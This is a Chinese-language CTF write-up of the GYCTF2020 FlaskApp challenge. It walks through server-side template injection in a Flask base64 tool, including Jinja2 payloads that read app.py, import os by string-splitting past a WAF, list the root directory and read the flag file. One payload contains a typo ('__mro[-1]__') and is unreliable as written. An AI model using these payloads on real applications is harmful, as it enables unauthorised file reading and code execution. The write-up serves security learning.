[GYCTF2020]FlaskApp
1.前言
最近的比赛太多了,每个比赛里面的Web方向的题目都千奇百怪,最近的Web题目能够遇到一个之前了解过的漏洞是越来越难了。像我这种已经被边缘化的Web狗在这种大比赛面前已经没有生存的空间了。仍然是继续补习SSTI的一天,继续打靶场吧。
2.正文
首先拿到题目
这是一个用flask写的用来加解密base64的Web应用程序。我们来测试一下它的报错情况,因为对于python来讲base64的解密过程,如果用户所输入的字符的格式不是base64的话,程序就会报出一个异常错误。所以,我们在解密窗口随便输一串字符就可以了(不会有人随便输一串字符都是base64的吧doge)
我们看到了一个熟悉的函数render_template_string(),这说明这个网站存在着SSTI,我们尝试注入{{11}}
解密结果
可以看到是可以将用户的输入进行渲染的,我们完成了SSTI的测试。但是,事实上我们用{{22}}进行测试的时候,遇到了拦截,看来该程序存在着一个小的WAF。
后来,我确定了我之所以输入{{22}}被waf拦截是因为我这其中的星号,但是为了后续的注入过程,我们仍要将该网站的源文件读出来,来看看其中都过滤了什么?
先输入{{().__class__.__mro__}}
尝试一下
我们要利用object对象进行测试同时也要找到含有内建函数__builtins__的类,再借用builtins中的open来读取源文件。
{% for c in [].__class__.__mro__[-1].__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}
我们从源码中读到了一些信息,其中就有waf的过滤信息。我们用字符串拼接的方式进行绕过。我们这一次构造列出根目录信息的payload
{% for c in ().__class__.__mro[-1]__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
我们看到了一个this_is_the_flag.txt文件,通过小改一下第一次的payload,来构造这一次的文件读取payload。
{% for c in ().__class__.__mro__[-1].__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_f' + 'lag.txt','r').read()}}{% endif %}{% endfor %}
后记
这道题的预期解并不是这个样子的,这道题的预期解是通过flask的pin码来从debug界面获得一个可用的命令行。但是最近在学SSTI而且看到了网上很多大师傅的绕过姿势,就想着自己也用纯SSTI的方式来做这道题。